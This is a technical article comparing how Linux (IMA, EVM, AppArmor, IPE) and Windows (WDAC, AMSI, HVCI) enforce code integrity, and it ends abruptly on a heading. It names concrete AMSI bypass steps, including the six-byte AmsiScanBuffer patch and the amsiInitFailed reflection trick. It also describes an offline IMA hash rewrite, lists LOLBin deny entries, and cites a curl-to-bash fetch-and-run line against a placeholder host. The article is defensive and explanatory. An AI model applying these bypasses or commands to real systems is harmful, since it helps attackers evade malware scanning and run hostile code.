
Two Routes to Code Integrity: Linux IMA + AppArmor vs Windows WDAC + AMSI

Linux and Windows answer one question -- "is this code allowed to run?" -- with very different machinery. Where the verifier lives matters more than how strong it is.


1. Two bypasses, same architectural shape

On a Windows 11 desktop, an attacker with a PowerShell session under their control can blind Microsoft Defender to every script that session ever evaluates by overwriting six bytes inside one function in amsi.dll. The Antimalware Scan Interface, the in-process bridge between scripting hosts and the registered antivirus product, dutifully reports "clean" on every subsequent buffer because the prologue of AmsiScanBuffer has been patched to mov eax, 0; ret (B8 00 00 00 00 C3).

The interface ships exactly as Microsoft documents it, and AmsiScanBuffer still matches its published MSDN signature: the attacker did not need to break anything. They needed only to write into an address space they already owned.

On a Linux server, a different attacker with offline access to the disk -- recovered from a stolen laptop, a forensics image, a hostile cloud-provider snapshot -- mounts the filesystem and rewrites a system binary together with the file's security.ima extended attribute. When the box boots, the kernel's Integrity Measurement Architecture hashes the binary at exec time, compares the hash to the value stored in security.ima, sees a match, and allows execution. Without the Extended Verification Module, IMA appraisal has no defence against this offline-rewrite attack -- the reference hash is sitting next to the file the attacker just replaced.

Both operating systems claim fail-closed code-integrity enforcement. Both lose to a single architectural mistake about where the check runs. The mistakes are different in detail and identical in shape: the verifier is reachable by the attacker. On Windows the attacker shares the script host's address space with the scanner. On Linux the attacker shares the on-disk container with the reference hash.

This article exists to make that symmetry visible. The two stacks reached their 2026 form by very different routes -- Linux composes six narrow Linux Security Modules and one userspace daemon, Windows ships one tightly-coupled product line -- but the breakthroughs on each side answered the same question: how do you move the verifier out of reach?

The Linux answer was EVM (HMAC the extended attributes that IMA depends on) and IPE (decide on immutable file properties rather than file contents). The Windows answer was HVCI (lift the kernel-mode code-integrity check into a hypervisor-isolated secure kernel). The names are different. The lesson is one.

Why did Linux and Windows arrive at such different architectures in the first place? That story starts in an IBM research lab in 2003.

2. The question both operating systems are trying to answer

Both lineages exist to answer one question -- "is this code allowed to run?" -- but they put the check in completely different places. Before we can compare them honestly, we need a shared vocabulary for the three layers any production code-integrity stack must cover.

The first layer is code integrity itself, often abbreviated CI: a gate on the file's content or its signer. Did this .so come from a package my distribution signed? Does this .exe match an Authenticode chain rooted in a publisher my policy trusts? The answer is binary. The hook fires before the process loads the bytes.

The second layer is mandatory access control, or MAC. Now the process is running. What can it do? Can nginx open /etc/shadow? Can mshta.exe spawn cmd.exe? MAC is enforced by the kernel above discretionary access control and cannot be overridden by userspace privileges.

Mandatory Access Control (MAC)

A kernel-enforced policy layer above traditional discretionary access control (DAC). Unlike DAC, where the file owner sets permissions, MAC policy is set by the system administrator and applied uniformly to all processes; no user, including root, can override it without changing the policy itself.

The third layer is content inspection: gating not on the file but on the buffer the interpreter is about to evaluate. The PowerShell engine has just deobfuscated a long string into a script block. Is the script block malicious? Linux has no production equivalent. Windows ships AMSI for exactly this.

Where each operating system puts these checks tells you almost everything about its architectural philosophy.

Linux puts every check on a Linux Security Module hook. IMA registers at bprm_check (the kernel hook that fires when a binary is about to be executed), file_mmap with MAY_EXEC, module_check, firmware_check, and kexec_*. AppArmor and SELinux register at the syscall-level access hooks. fapolicyd rides on top of fanotify. IPE hooks op=EXECUTE. The kernel is the trust boundary, and every mechanism is a polite tenant inside it.

Linux Security Module (LSM)

The kernel framework, merged into Linux 2.6.0 in December 2003, that hosts pluggable security modules at well-defined hook points in the kernel. LSMs include SELinux, AppArmor, Smack, Tomoyo, IMA, EVM, IPE, BPF LSM, and Landlock; multiple modules can coexist via "LSM stacking".

Windows takes the opposite path. The PE loader is the gate for user-mode code integrity (UMCI). The kernel-mode code-integrity check is, in the modern stack, moved out of the normal kernel into a small secure kernel running on top of Hyper-V -- Hypervisor-protected Code Integrity, HVCI. The script broker runs in-process with each scripting host. Cloud reputation is consulted via the Intelligent Security Graph and exposed to consumers as Smart App Control.

TPM Platform Configuration Register (PCR)

A monotonically extendable hash register inside a Trusted Platform Module. New measurements are folded in with PCR_new = SHA256(PCR_old || measurement). Once extended, the value cannot be rolled back without resetting the TPM. IMA extends file-content hashes into PCR 10; the Windows Measured Boot chain uses PCRs 0-7 and 11-14.

The architectural philosophy comes down to a sentence each. Linux trusts the kernel surface and packs every integrity mechanism into it as a separate LSM. Windows trusts a hypervisor-isolated secure kernel and uses it to host the integrity logic the normal kernel cannot be trusted to run honestly.

The three layers of code-integrity enforcement, and where Linux and Windows place each mechanism.

Neither stack started this way. The 2026 stack on each side is the accumulated answer to fifteen years of failures. Here is how they grew up.

3. Two genesis stories

In 2003, four IBM researchers at the T. J. Watson Research Center -- Reiner Sailer, Xiaolan Zhang, Trent Jaeger, and Leendert van Doorn -- tried to convince the USENIX Security community that you could prove the integrity of a Linux web server to a remote verifier. Their paper, Design and Implementation of a TCG-based Integrity Measurement Architecture, shipped at the 13th USENIX Security Symposium in 2004. It proposed hashing every executable file at load time, extending each hash into a TPM platform configuration register, and sending the resulting measurement list to a remote verifier who could compare it to a known-good manifest.

The performance evaluation measured the cost on an IBM Netvista with a 2.4 GHz Pentium 4: the file_mmap LSM hook added 0.08 microseconds per call on a cache hit, and SHA-1 fingerprinting ran at roughly 80 MB/s. The headline claim was that more than 99.9% of measure calls landed on the cached path, so the overhead was essentially free.

Pentium 4-era SHA-1 at 80 MB/s vs Ice Lake-era SHA-NI-accelerated SHA-256 at roughly 2 GB/s per core: a 25x throughput jump in twenty years. The original paper's qualitative finding -- cache hit dominates, overhead is negligible -- holds even more strongly on modern silicon.

It took five years for that proposal to reach the kernel. IMA's measurement-only mode was merged in Linux 2.6.30 in June 2009. It hashed files at bprm_check, file_mmap, and module_check, extended TPM PCR 10, and otherwise let everything run.

The "is this hash allowed?" question would have to wait three more years. The Extended Verification Module landed in Linux 3.2 in January 2012; digital-signature mode for EVM followed in 3.3 in March 2012; and IMA-appraise, the enforcement extension that finally let the kernel return -EPERM when a file's hash did not match security.ima, merged in Linux 3.7 in December 2012. The same LWN article frames the cadence plainly: "Much of IMA was added to the kernel in 2.6.30, but another piece, the extended verification module (EVM) was not merged until 3.2 ... Digital signature support was added to EVM in 3.3, and IMA appraisal is currently under review." Mimi Zohar's appraisal patchset is the canonical lore.kernel.org artifact of that final step.

AppArmor took a different, longer road. It was born inside Immunix in 1998 under the name "SubDomain", a path-based confinement layer designed to stop privilege-escalation exploits from doing anything the binary's profile did not name. Novell acquired Immunix in 2005, renamed SubDomain to AppArmor, and shipped it as the default mandatory access control layer on SLES and openSUSE. According to the Ubuntu AppArmor wiki, "AppArmor support was first introduced in Ubuntu 7.04, and is turned on by default in Ubuntu 7.10 and later" -- so by October 2007 AppArmor was already a default-on production MAC on the most-deployed Linux desktop distribution.

Mainlining did not happen until October 2010, when AppArmor finally landed in Linux 2.6.36. Seven years out of tree, three years default-on in Ubuntu, before the kernel community accepted it.

The contrast with SELinux is sharp. SELinux merged into Linux 2.6.0 in December 2003 -- barely a year after the LSM framework was created. SELinux was, in fact, the reason the LSM framework existed.

The Windows lineage starts in a different building entirely. AppLocker shipped with Windows 7 and Windows Server 2008 R2 in 2009: a user-mode-only allowlist, with no hypervisor or kernel-mode backing, and rules tied to file paths, publishers, or hashes. AppLocker is still supported on modern Windows but "isn't getting new feature improvements"; the modern successor is App Control for Business.

Windows 10 RTM (version 1507, July 2015) shipped the first version of Device Guard along with AMSI and PowerShell 5.0, which integrated with AMSI from day one. Device Guard became known as Windows Defender Application Control (WDAC) and then, in 2024, was renamed once more to App Control for Business. User-mode code integrity (UMCI) became a policy option, FilePath rules were added in Windows 10 version 1903, multiple-policy authoring landed in the same release, and Smart App Control made its consumer debut in Windows 11 22H2 in September 2022.

Code-integrity lineages on Linux and Windows, 2003 to 2024. Linux composes; Windows consolidates.

Two timelines, two design philosophies, both shipping their v1 with the same kind of mistake. The next section makes that concrete.

4. Where the naive approach breaks

Both stacks shipped their first version with the check in the wrong place. Two stories make this concrete; two more refine it.

Story A: IMA-as-shipped (2009) without EVM

When IMA reached the kernel in Linux 2.6.30, it hashed the file at bprm_check and stored the reference hash in the file's security.ima extended attribute. That is what an attacker with offline disk access needs to defeat the check, and exactly nothing else. Mount the filesystem from another box, swap the binary for a malicious one, recompute the SHA over the new binary, write the new value into security.ima. Boot the box. The kernel hashes the malicious binary at exec, reads the matching xattr the attacker just wrote, and lets the syscall through.

This is the offline-tampering attacker model EVM was designed to defeat. The contemporaneous LWN coverage put it plainly: "IMA can be subverted by 'offline' attacks, where file data or metadata is changed out from under IMA. Mimi Zohar has proposed the extended verification module (EVM) patch set as a means to protect against these offline attacks."

The EVM v5 patchset, posted by Zohar in May 2011, describes the design directly: "Extended Verification Module (EVM) detects offline tampering of the security extended attributes (e.g. security.selinux, security.SMACK64, security.ima) ... initial method maintains an HMAC-sha1 across a set of security extended attributes, storing the HMAC as the extended attribute 'security.evm'."

Story B: AMSI as shipped (2015) inside the script host

AMSI's design is documented in How AMSI helps you defend against malware: "Script (malicious or otherwise), might go through several passes of de-obfuscation. But you ultimately need to supply the scripting engine with plain, un-obfuscated code. And that's the point at which you invoke the AMSI APIs."

A scripting host -- PowerShell, WSH, MSHTA, Office VBA, the UAC installer dialog -- calls AmsiInitialize, then for every plain-text script buffer it is about to execute calls AmsiScanBuffer or AmsiScanString. The call is routed through amsi.dll, loaded into the host process, which dispatches to the registered IAntimalwareProvider COM server. Defender is the default provider.

The detection logic is sound. The trust boundary is not. The attacker already controls the script host. Three single-shot bypass techniques have lived in red-team toolkits since 2016:

  1. Patch AmsiScanBuffer's prologue in memory to mov eax, 0; ret (B8 00 00 00 00 C3). Six bytes of opcode rewrite, no syscalls required, blinds the scanner permanently for this process.
  2. Set System.Management.Automation.AmsiUtils.amsiInitFailed = true via reflection. PowerShell checks the flag on every scan path and short-circuits.
  3. Unload amsi.dll via FreeLibrary. There is no scanner left to call.

Microsoft tracks this so closely that its own "Applications that can bypass App Control" deny list calls out the AMSI-bypass-capable versions of system.management.automation.dll by hash. The defender's authoritative list of files-to-block treats specific signed Microsoft DLLs as named threats.

The same Microsoft bypass list also enumerates mshta.exe, wscript.exe, cscript.exe, msbuild.exe, Microsoft.Build.dll, windbg.exe, cdb.exe, kd.exe, dotnet.exe, csi.exe, rcsi.exe, addinprocess.exe, wmic.exe, bash.exe, wsl.exe, runscripthelper.exe, and dozens of others -- 40+ entries today, growing whenever a new Microsoft-signed binary turns out to host an attacker-friendly evaluator.
Why AMSI's trust boundary is wrong: the simplest model of an in-process bypass
// In Windows, AMSI scans each plain-text script buffer just before
// the scripting engine evaluates it. The scanner lives in amsi.dll,
// loaded into the script host process. The attacker who controls
// that process can rewrite the function's first few bytes.
//
// This toy model shows the consequence: once "patched", the scanner
// returns CLEAN regardless of input, and the assertion below holds
// for every possible payload.

const AMSI_RESULT_CLEAN = 0;
const AMSI_RESULT_MALWARE = 32768;

function amsiScanBuffer(buf, patched) {
  if (patched) return AMSI_RESULT_CLEAN;
  if (buf.includes("Invoke-Mimikatz")) return AMSI_RESULT_MALWARE;
  return AMSI_RESULT_CLEAN;
}

console.log("Normal mode:");
console.log("  clean payload:    ", amsiScanBuffer("Get-Process", false));
console.log("  malicious payload:", amsiScanBuffer("Invoke-Mimikatz", false));

console.log("\nAfter six-byte patch:");
console.log("  clean payload:    ", amsiScanBuffer("Get-Process", true));
console.log("  malicious payload:", amsiScanBuffer("Invoke-Mimikatz", true));

// The takeaway: no input ever produces MALWARE once the scanner is patched.
// Strengthening AMSI's signature engine cannot fix this. The scanner
// must move out of the script host's address space.


Story C: WDAC's "trust all Microsoft-signed code" anti-pattern

A WDAC policy that trusts code signed by Microsoft also trusts every binary Microsoft has ever signed. That set includes mshta.exe, wscript.exe, cscript.exe, msbuild.exe, wmic.exe, system.management.automation.dll, and the 40-plus other binaries enumerated on Microsoft's own App Control bypass list. The LOLBAS community catalogue widens the field to roughly 200 living-off-the-land binaries with explicit MITRE ATT&CK technique mappings.

The pattern is structural: WDAC grants trust at signer granularity (a chain rooted at "Microsoft Corporation"); attackers exploit at binary granularity (the specific mshta.exe that will happily evaluate an HTA blob containing a PowerShell stager). Any non-trivial WDAC policy must therefore contain explicit hash-level denies for the known-bad versions, and must keep growing those denies as Microsoft ships new signed binaries.
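The precedence that makes those denies effective can be sketched in a few lines (the signer and hash values are invented; real App Control compiles far richer rule sets, but deny-before-allow is the load-bearing detail modeled here):

```javascript
// Toy model of signer-granularity allow vs hash-granularity deny.
// Deny rules are evaluated before allow rules, so a hash-level deny
// overrides a matching publisher-level allow.
function wdacDecide(file, policy) {
  if (policy.denyHashes.has(file.sha256)) return "DENY";
  if (policy.allowSigners.has(file.signer)) return "ALLOW";
  return "DENY"; // default-deny allowlist
}

const policy = {
  allowSigners: new Set(["Microsoft Corporation"]),
  // hypothetical hash of a bypass-capable mshta.exe build
  denyHashes: new Set(["hash-of-known-bad-mshta"]),
};

const notepad = { signer: "Microsoft Corporation", sha256: "hash-of-notepad" };
const mshta   = { signer: "Microsoft Corporation", sha256: "hash-of-known-bad-mshta" };

console.log(wdacDecide(notepad, policy)); // ALLOW: trusted signer, not denied
console.log(wdacDecide(mshta, policy));   // DENY: hash-level deny wins
// Every newly shipped Microsoft-signed evaluator starts in the ALLOW
// bucket until its hash lands in denyHashes: the arms race is built in.
```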

Story D: fapolicyd's permissive-window failure

fapolicyd is the Red Hat userspace allowlister. It sits on the fanotify permission channel and answers "may this open or exec proceed?" against a compiled rule database. It does not have IMA's offline-tampering problem because trust is inherited from the RPM database: "An application is trusted when the system package manager correctly installs it and therefore registered in the system RPM database. The fapolicyd daemon uses the RPM database as a list of trusted binaries and scripts."

What it does have is an operational footgun. Setting permissive=1 "just for troubleshooting" silently disables enforcement. Terminating the daemon causes the kernel to fail open after the fanotify response timeout. The architectural choice -- userspace daemon over kernel-mode hook -- is what makes both failure modes possible.

The check was strong. The boundary protecting the check was weak. On IMA-as-shipped the reference hash sat next to the file the attacker rewrote. On AMSI the scanner sat inside the process the attacker controlled. On WDAC the trust grant was wider than the exploitation unit. On fapolicyd the verifier was a userspace process that could be terminated. Four different stacks, four different boundary failures, one identical lesson.

| Bypass class | Stack | Concrete example | Root cause |
| --- | --- | --- | --- |
| Offline metadata swap | IMA without EVM | Rewrite binary and matching security.ima xattr from rescue media | Reference value stored next to the file under attacker control |
| In-process scanner patch | AMSI in PowerShell | mov eax, AMSI_RESULT_CLEAN; ret over AmsiScanBuffer prologue | Scanner shares address space with the script host the attacker runs in |
| Signer-vs-binary mismatch | WDAC Publisher rules | Allow Microsoft-signed code, attacker runs mshta.exe | Trust grant is coarser than the exploitable unit |
| Daemon liveness | fapolicyd | Terminate fapolicyd or set permissive=1 | Verifier is a userspace process with no kernel-rooted backstop |

Each of these failures has the same shape: the check was strong, the boundary protecting the check was weak. Both operating systems noticed, and fixed it in 2012 and 2016 in very different ways. Both fixes followed the same principle.

5. The architectural pivots

Both lineages reached the same conclusion at the same time: strengthen the boundary, not the check. Each pivot moved the trust boundary outward, beyond the place the attacker could reach.

EVM (Linux 3.2, January 2012): the xattrs become non-forgeable

The Extended Verification Module computes an HMAC over the security-relevant extended attributes -- security.ima, security.selinux, security.SMACK64, security.apparmor, security.capability -- plus inode metadata (UID, GID, mode, generation), and stores the result in security.evm. The HMAC key is loaded into the kernel keyring at boot, ideally sealed to a TPM 2.0 PCR set so the key is not retrievable except on a machine whose boot state matches the sealing measurement. The kernel keyring documentation for trusted and encrypted keys describes the substrate.

An offline attacker with disk access still cannot forge security.evm without the HMAC key. Digital-signature mode (EVM portable signatures, Linux 3.3) gives the same guarantee without any on-box key material. The check did not get cryptographically stronger: HMAC-SHA256 was not new in 2012. What changed was that the reference value the check consults moved from "an xattr next to the file" to "an xattr whose integrity is bound to a key the attacker does not have". Red Hat documents the modern setup in Enhancing security with the kernel integrity subsystem.

Extended Verification Module (EVM)

The Linux integrity module that protects the security-relevant extended attributes IMA depends on. EVM computes an HMAC (or digital signature) over the xattr set plus inode metadata and stores it in security.evm. Without the EVM key, an offline attacker cannot rewrite a binary and its matching security.ima to produce a valid pair.

IMA + EVM appraisal flow at bprm_check. EVM verifies the integrity of the xattr IMA reads; without EVM, IMA's reference value is offline-rewritable.

IMA-appraise (Linux 3.7, December 2012): from observation to enforcement

The merge cadence on the kernel side is itself part of the story. Measurement-only IMA shipped in 2.6.30 in 2009. EVM merged in 3.2 in January 2012. EVM digital signatures merged in 3.3 in March 2012. IMA-appraise, which finally lets the kernel return -EPERM on a hash mismatch, merged in Linux 3.7 in December 2012. Three and a half years from "we hash files" to "we refuse to run files that fail the hash". The gap was not engineering laziness; it was the time it took to design and merge the boundary-strengthening pieces that made enforcement safe to enable.

HVCI / Memory Integrity (Windows 10 1607, August 2016): the secure kernel

Windows took the equivalent step four years later, but at a different layer. Virtualization-Based Security (VBS) splits Windows into Virtual Trust Level 0 -- the normal kernel everyone has been writing rootkits for since 1993 -- and Virtual Trust Level 1, a small secure kernel hosted by Hyper-V. The kernel-mode Code Integrity check that gates loading of every driver is moved into VTL1. A VTL0 attacker with full SYSTEM, even one who has loaded a malicious driver, cannot patch the VTL1 verifier; they cannot even read its memory.

Virtualization-Based Security (VBS) / VTL0 vs VTL1

Windows' Hyper-V-rooted split that puts a small secure kernel in VTL1, isolated from the normal Windows kernel (VTL0) by the hypervisor. Hypervisor-protected Code Integrity (HVCI), exposed in Windows Settings as "Memory integrity", uses VTL1 to host the kernel-mode code-integrity check, so a VTL0 attacker with SYSTEM cannot patch the verifier or downgrade its policy.

Microsoft's HVCI documentation frames the W^X invariant HVCI enforces on kernel pages: "memory integrity ... protects and hardens Windows by running kernel mode code integrity within the isolated virtual environment of VBS ... ensuring that kernel memory pages are only made executable after passing code integrity checks inside the secure runtime environment, and executable pages themselves are never writable." A kernel page can be writable or executable; never both at the same time. The split is enforced by the hypervisor.
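The invariant is small enough to state as a toy state machine (illustrative only; the real enforcement lives in hypervisor-managed extended page tables, not in kernel-visible flags):

```javascript
// Toy model of the W^X invariant HVCI enforces on kernel pages:
// a page becomes executable only after passing code integrity, and
// the same transition strips write access.
class KernelPage {
  constructor() { this.writable = true; this.executable = false; }

  makeExecutable(passedCodeIntegrity) {
    if (!passedCodeIntegrity) {
      throw new Error("CI check failed: page stays non-executable");
    }
    this.writable = false;   // write permission removed in the same step
    this.executable = true;
  }

  makeWritable() {
    this.executable = false; // never writable and executable at once
    this.writable = true;
  }
}

const page = new KernelPage();
page.makeExecutable(true);
console.log(page.writable, page.executable);      // false true
console.log(!(page.writable && page.executable)); // invariant holds
page.makeWritable();
console.log(!(page.writable && page.executable)); // still holds
```

The point of hosting these transitions in VTL1 is that a VTL0 attacker cannot call a "make writable and executable" path that does not exist in the secure kernel's interface.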

"HVCI", "Memory Integrity", and "kernel-mode code integrity running in VBS" are the same mechanism. Microsoft's product-name churn here is unusually thick: the Windows Settings UI calls it Memory Integrity, the documentation page is titled "Enable virtualization-based protection of code integrity", the underlying capability is HVCI, and Microsoft also markets the same hardware-and-software bundle as "Secured-Core PC".

HVCI relocates the kernel-mode code-integrity check into VTL1. A VTL0 attacker with SYSTEM cannot reach the verifier.

IPE (Linux 6.12, November 2024): property-based decisions

The most recent Linux pivot moves further still. Integrity Policy Enforcement, upstreamed in Linux 6.12 in November 2024 from a Microsoft-contributed patch series (source on GitHub), does not hash files at all. Its kernel documentation is explicit: "Integrity Policy Enforcement (IPE) is a Linux Security Module that takes a complementary approach to access control. Unlike traditional access control mechanisms that rely on labels and paths for decision-making, IPE focuses on the immutable security properties inherent to system components." A policy rule looks like:

op=EXECUTE dmverity_signature=TRUE dmverity_roothash=sha256:<hex> action=ALLOW
op=EXECUTE fsverity_signature=TRUE action=ALLOW
op=EXECUTE action=DENY

The kernel is not asked "what is the SHA-256 of this file?" at op=EXECUTE time. It is asked "did this file come from a dm-verity device whose root hash matches one of our trusted signatures?" The verifier has nothing to compute per access; it has only to read a pre-computed property. The trust boundary has moved out to whoever signed the dm-verity image at build time.
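A first-match evaluator over those three rules might look like this sketch (the property names mirror the policy syntax above; the evaluator itself is a toy, not IPE's in-kernel parser):

```javascript
// Toy first-match evaluator for property-based execution policy.
// Rules are checked in order; the first rule whose required
// properties all hold decides the outcome.
const policy = [
  { op: "EXECUTE", require: { dmverity_signature: true }, action: "ALLOW" },
  { op: "EXECUTE", require: { fsverity_signature: true }, action: "ALLOW" },
  { op: "EXECUTE", require: {}, action: "DENY" }, // catch-all
];

function ipeDecide(op, properties) {
  for (const rule of policy) {
    if (rule.op !== op) continue;
    const matches = Object.entries(rule.require)
      .every(([key, val]) => properties[key] === val);
    if (matches) return rule.action;
  }
  return "DENY";
}

// A binary from a signed dm-verity image: the property was established
// once at mount time, so the per-exec decision is a lookup, not a hash.
console.log(ipeDecide("EXECUTE", { dmverity_signature: true })); // ALLOW
// A binary dropped into /tmp carries neither property.
console.log(ipeDecide("EXECUTE", {}));                           // DENY
```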

fs-verity (Linux 5.4, November 2019): O(log n) per page

The cryptographic complement is fs-verity, upstreamed in Linux 5.4 in November 2019 by Eric Biggers and Theodore Ts'o at Google. The kernel docs describe the trick: "fs-verity is similar to dm-verity but works on files rather than block devices ... userspace can execute an ioctl that causes the filesystem to build a Merkle tree for the file and persist it to a filesystem-specific location ... Userspace can use another ioctl to retrieve the root hash ... in constant time, regardless of the file size."

The Merkle tree turns whole-file hashing into O(log n) verification per page read, with constant-time digest retrieval. Concretely, an APK or container layer with thousands of pages does not need a full hash on first open; the page cache verifies the leaves and intermediate Merkle nodes only for the pages actually touched. IMA can consume fs-verity's digest directly through the digest_type=verity modifier in its policy language.

The breakthrough was not a stronger check. It was moving the check out of the attacker's address space.

Each pivot moved the trust boundary outward in a different direction. EVM moved the integrity root from "xattr next to the file" to "HMAC-keyed xattr, key sealed to TPM PCRs". HVCI moved the kernel-mode verifier from "in the kernel the attacker can patch" to "in a secure kernel the attacker cannot reach without breaking the hypervisor". IPE moved the per-access decision from "recompute a file's hash" to "look up a precomputed property". Fs-verity collapsed the per-access cost from O(n) on the file to O(log n) on a Merkle path.

The crypto was already strong. The breakthrough was the geometry of where the verifier lived.

By 2020 both stacks looked dramatically different from their 2009 and 2015 originals. Here is what each one looks like today, side by side.

6. The stack today, side by side

Eleven moving parts. Here is how they line up.

| Linux | Windows | Layer |
| --- | --- | --- |
| IMA appraise + EVM | App Control (WDAC) UMCI | User-mode code integrity |
| Kernel module signing | App Control + HVCI driver enforcement | Kernel-mode code integrity |
| fs-verity + dm-verity | HVCI page-level W^X + signed catalogues | Page-level integrity |
| AppArmor / SELinux | (no direct analogue; closest is AppContainer / ASR) | Mandatory access control |
| fapolicyd | App Control + AppLocker | User-space allowlist |
| IPE | App Control (FilePath / hash rules) | Property-based code integrity |
| (no direct analogue) | AMSI | Script content scan |
| (no direct analogue) | Smart App Control + ISG | Cloud reputation |

The mapping is not 1-to-1 in either direction. Linux composes; Windows consolidates. To compare meaningfully we have to look at each layer in turn.

6.1 Code-integrity enforcers: IMA + EVM vs WDAC vs IPE

| Dimension | Linux IMA + EVM | WDAC (App Control) | IPE |
| --- | --- | --- | --- |
| Enforcement layer | VFS / LSM hook (file open, mmap, exec) | PE loader (kernel CI, user-mode CI) | LSM hook on op=EXECUTE |
| Identity primitive | File-content hash or imasig / modsig / sigv3 | Authenticode chain, hash, FilePath, or ISG | dm-verity root hash / fs-verity digest |
| Policy expression | Procedural rules (func= / mask= / fsmagic=) | Signed XML compiled to binary .p7b | Signed plain-text DFA |
| Worst-case per-access | O(n) hash on first access; O(1) cached | O(1) cached; O(n) hash on cache miss | O(1) (properties precomputed) |
| Fail-closed mode | Yes (appraise) | Yes (enforced) | Yes |
| Remote-attestation friendly | Yes (TPM PCR 10) | Indirect (Measured Boot logs) | Indirect |
| Bypass arms race | Whole-disk swap (countered by EVM key sealing) | LOLBins (Microsoft block list + community LOLBAS) | Limited surface (DFA-only) |

The IMA policy ABI documents the full rule grammar: action [condition ...] where action is one of measure | dont_measure | appraise | dont_appraise | audit | dont_audit | hash | dont_hash, and conditions select on func=, mask=, fsmagic=, fsuuid=, uid=, fowner=, LSM-label predicates, and the all-important appraise_type= modifier that names the signature scheme. IMA template management controls what gets recorded per measurement-list entry; the two templates used in practice today are ima-ng (d-ng|n-ng: hash-algo-prefixed digest plus name) and ima-sigv2 (d-ngv2|n-ng|sig: versioned digest plus name plus signature).
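Put together, a minimal appraisal policy under that grammar might read like the following hypothetical /etc/ima/ima-policy fragment (IMA rules are first-match, so the exemptions come first; adapt the appraise_type= modifier to your signing scheme):

```
# Skip pseudo-filesystems with no persistent content to appraise.
dont_appraise fsmagic=0x9fa0        # procfs
dont_appraise fsmagic=0x62656572    # sysfs

# Measure everything executed or mmap'ed executable into PCR 10.
measure func=BPRM_CHECK
measure func=FILE_MMAP mask=MAY_EXEC

# Appraise the same set, requiring a digital signature in security.ima
# rather than a bare hash.
appraise func=BPRM_CHECK appraise_type=imasig
appraise func=FILE_MMAP mask=MAY_EXEC appraise_type=imasig
```

The dont_appraise exemptions are not optional niceties: without them, the first read of a procfs file under an unconditional appraise rule fails closed.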

WDAC's policy rule reference defines the rule kinds operators actually write: Publisher, PcaCertificate, LeafCertificate, FileName, Version, Hash (SHA-1, SHA-256, or SHA-384), FilePath (added in 1903 and explicitly weaker because a user with write access can substitute the file), Managed Installer, and Intelligent Security Graph. The compiled output is a signed binary .p7b CIPolicy.

The same doc records the default-on audit-mode behaviour that has surprised many operators: "We recommend that you use Enabled:Audit Mode initially because it allows you to test new App Control policies before you enforce them ... By default, only kernel-mode binaries are restricted. Enabling the following rule option validates user mode executables and scripts." The Enabled:UMCI flag is what flips a WDAC policy from kernel-only to full user-mode enforcement.

WDAC policy evaluation. The Authenticode chain is parsed first; rule kinds are evaluated in priority order; bypass-list deny rules are normally added as a last-stop safety net.

6.2 Mandatory access control: AppArmor vs SELinux

| Dimension | AppArmor | SELinux |
| --- | --- | --- |
| Model | Path-based allowlist per binary | Type-enforcement on subject x object x class |
| Storage of policy state | In-memory DFA loaded from user space | security.selinux xattr + compiled policy.31 |
| Granularity | Profile per executable | Per-type, per-class, per-operation |
| Survives file rename | No (path is the identity) | Yes (xattr travels with inode) |
| Default-on distros | Ubuntu, openSUSE, SLES | RHEL, Fedora, Oracle Linux, Android, ChromeOS |
| Authoring tools | aa-genprof, aa-logprof, aa-enforce | audit2allow, semodule, refpolicy, udica |

AppArmor's kernel documentation describes the model directly: "AppArmor is MAC style security extension for the Linux kernel. It implements a task centered policy, with task 'profiles' being created and loaded from user space." A profile reads like a rule file rather than a label algebra:

/usr/sbin/nginx {
  capability net_bind_service,
  /etc/nginx/** r,
  /var/log/nginx/* w,
  /var/www/** r,
  network inet stream,
}

The kernel compiles each profile to a DFA at load time, so policy lookup is O(L) in path length. SELinux answers queries with a hash-table lookup against compiled type-enforcement rules, backed by an in-memory access-vector cache for O(1) hot decisions. Both are practical; they differ on which model fits the way an administrator thinks. AppArmor wins on auditability and quick authoring; SELinux wins on expressiveness and on multi-level security. Smack is a third in-tree LSM, simpler than SELinux, used heavily by Tizen.

6.3 Hypervisor-anchored CI: HVCI

HVCI's runtime cost is dominated by the hypercall round-trip from VTL0 to VTL1 on driver load and on each executable-page allocation. Steady-state overhead is small on hardware with the right capabilities.

Microsoft's HVCI documentation names the dependency: "Memory integrity works better with Intel Kabylake and higher processors with Mode-Based Execution Control, and AMD Zen 2 and higher processors with Guest Mode Execute Trap capabilities. Older processors rely on an emulation of these features, called Restricted User Mode, and will have a bigger impact on performance." Practitioner-visible rule of thumb: less than 5 percent overhead on MBEC/GMET-capable silicon, 10 to 20 percent on kernel-bound workloads when the CPU has to emulate.

HVCI hardware prerequisites per the OEM VBS guidance: 64-bit CPU with virtualization extensions (VT-x or AMD-V), second-level address translation (EPT or RVI), an IOMMU (VT-d or AMD-Vi), TPM 2.0, UEFI MAT, Secure MOR v2, and ideally MBEC (Intel) or GMET (AMD).

6.4 Script-level inspection: AMSI vs Linux's gap

| Dimension | AMSI | Linux IMA on scripts |
| --- | --- | --- |
| What it sees | Deobfuscated script buffer at execution time | Whole-file content at open or mmap |
| Coverage | PowerShell, WSH, VBA, JScript, MSHTA, UAC installers, .NET, Edge | Any file whose func=FILE_CHECK rule matches |
| Provider model | COM IAntimalwareProvider per process | None; kernel verifies signature directly |
| Defends against runtime obfuscation | Yes (sees final buffer) | No (sees file as written) |
| Trust boundary | Wrong (in-process; patchable by attacker) | Right (kernel-side; attacker cannot patch) |

The asymmetry is the point. AMSI sees what the interpreter is about to evaluate; IMA sees only what is on disk. AMSI catches in-memory PowerShell payloads, Office macros that decode themselves at runtime, and Invoke-Expression evaluations that never touched the filesystem. IMA's hash is final at file write time and tells you exactly nothing about what bash -c "$(curl evil)" will execute.
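The asymmetry fits in a few lines. A toy Python model (the stub, payload, and variable names are all invented): the bytes IMA can hash are fixed at write time, while the buffer an AMSI-style hook sees is the decoded payload that only exists at evaluation time.

```python
import base64
import hashlib

# What sits on disk (the only thing IMA can appraise): a stub that
# decodes and evaluates its payload at runtime.
PAYLOAD = base64.b64encode(b"curl http://evil | sh")
stub_on_disk = b"import base64; exec(base64.b64decode(PAYLOAD))"

# IMA's view: a file-content hash, final at write time.
ima_view = hashlib.sha256(stub_on_disk).hexdigest()

# AMSI's view: the deobfuscated buffer handed to the interpreter at eval time.
amsi_view = base64.b64decode(PAYLOAD)

assert b"evil" in amsi_view          # visible to a buffer-level scanner
assert b"evil" not in stub_on_disk   # invisible to any file-content check
```

The on-disk stub can stay byte-identical (same hash, same signature, same appraisal verdict) across arbitrarily many different payloads.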

Constrained Language Mode

